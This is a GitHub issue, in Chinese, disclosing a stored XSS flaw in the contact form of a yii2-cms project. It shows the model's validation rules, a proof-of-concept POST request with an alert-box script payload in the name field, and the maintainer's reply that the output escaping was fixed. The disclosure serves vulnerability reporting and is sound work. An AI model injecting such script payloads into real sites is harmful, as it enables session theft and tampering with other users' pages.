Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

yii2-cms存在存储型XSS #2

Closed
SwagXz opened this issue Aug 31, 2019 · 1 comment

Comments

@SwagXz
Copy link

commented Aug 31, 2019

在前端的留言处未全部过滤输入内容或者限制输入长度

有效负荷:
<script>alert(1)</script>
文件名 protected\core\modules\home\models\Contact.php
代码

public function rules()
    {
        return [
            [['name', 'company', 'mobile', 'email'], 'required'],
            [['demand'], 'string'],
            [['created_at', 'status'], 'integer'],
            [['name', 'company'], 'string', 'max' => 90],
            [['mobile'], 'string', 'max' => 16],
            ['mobile','match','pattern'=>'/^[1][34578][0-9]{9}$/'],
            [['email'], 'string', 'max' => 64],
            [['email'], 'email'],
        ];
    }

利用
我们发现name没有限制输入的长度,尝试构造有效负荷
POC

POST /contact.html HTTP/1.1
Host: locahost
Content-Length: 306
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Referer: http://127.0.0.1/contact.html
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: __admin_identity=29fde27f9d74d644704952c376eda49e0743225903055339da36226197fe5b70a%3A2%3A%7Bi%3A0%3Bs%3A16%3A%22__admin_identity%22%3Bi%3A1%3Bs%3A16%3A%22%5B1%2Cnull%2C2592000%5D%22%3B%7D; Hm_lvt_4e97099691e58af0969cfcdcc6b29090=1567164052; language=213818186103fa19c30d2710ecd18c48946ee2fed0bdcf0e471bab24ce058358a%3A2%3A%7Bi%3A0%3Bs%3A8%3A%22language%22%3Bi%3A1%3Bs%3A5%3A%22zh_cn%22%3B%7D; PHPSESSID=38ddvm4dugu5jdq4pt0h02qr5s; _csrf=5e85092cfa3136d9cc8ee4322826276d759fd8c851c83ede47293177c4fe9153a%3A2%3A%7Bi%3A0%3Bs%3A5%3A%22_csrf%22%3Bi%3A1%3Bs%3A32%3A%22O12VBFrR_KCflwAXh8qvr4LMjscRlbem%22%3B%7D
Connection: close

_csrf=Aaq-w1PPi7_1C1seTIMQh0aI7VOoXKOf96plwSzQ9fpOm4yVEYn57apAGHgg9FHfLrCcJdpo79Kd2QaTQLKQlw%3D%3D&Contact%5Bname%5D=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&Contact%5Bemail%5D=133333%40qq.com&Contact%5Bmobile%5D=13333333333&Contact%5Bcompany%5D=1&Contact%5Bdemand%5D=1

结果
我们去后台查看
cve2

@xiaomalover

This comment has been minimized.

Copy link
Member

commented Sep 9, 2019

感谢反馈,
image
已修改,是因为title引用 了name,输出时忘记处理了,现已修改

@xiaomalover xiaomalover closed this Sep 9, 2019

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Projects
None yet
2 participants
You can’t perform that action at this time.